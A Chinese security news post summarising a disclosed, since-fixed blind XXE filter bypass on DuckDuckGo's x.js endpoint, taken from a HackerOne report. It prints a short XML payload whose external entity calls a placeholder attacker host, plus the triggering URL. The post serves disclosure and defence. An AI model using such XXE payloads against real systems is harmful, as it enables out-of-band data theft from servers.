DuckDuckGo上Blind XXE漏洞防护绕过

iso60001  1879天前

22.png

近期,白帽汇安全研究院发现HackerOne网站公开了一个DuckDuckGo网站的XXE漏洞。该漏洞是以前一个DuckDuckGo网站XXE漏洞的新绕过方法,两个漏洞的发现者为同一个人。(上个XXE漏洞说明:https://nosec.org/home/detail/2219.html)

DuckDuckGo强调在传统搜寻引擎的基础上引入各大Web 2.0站点的内容。其办站哲学主张维护使用者的隐私权,并承诺不监控、不记录使用者的搜寻内容。

——来自百度百科

以下为漏洞具体说明:

复现步骤

  1. 首先攻击者在自己的外网服务器上搭建web服务,并且放上一个文件内容如下的XXE攻击文件(xm l文件):

  2. <?xm l version="1.0" ?>
    <!DOCTYPE root [
    <!ENTITY % ext SYSTEM "http://attacker_host/Blind_xxe"> %ext;
    ]>
    <r></r>
  3. 攻击者在浏览器上访问 https://duckduckgo.com/x.js?u=http://attacker_host/xxe.xm l,其中http://attacker_host/xxe.xm l代表上一步的XXE攻击文件:

  4. 最后,攻击者可在自己的服务器上检测到http://attacker_host/Blind_xxe被访问,这说明攻击者的xm l文件成功被DuckDuckGo解析。

33.png

最后,发现者还表示,不仅duckduckgo.com存在这个问题,api.duckduckgo.com网站也存在这个问题。

随后,DuckDuckGo安全团队表示漏洞已再次修复,请帮忙检查。发现者在复查后,表示虽不知道后端防护逻辑,但漏洞已成功修复。不过,发现者同时表示,XXE漏洞的防护不能只检查文件引用源头,还要检查文件的内容。

44.png

本文由白帽汇整理并翻译,不代表白帽汇任何观点和立场
来源:https://hackerone.com/reports/486732

最新评论

昵称
邮箱
提交评论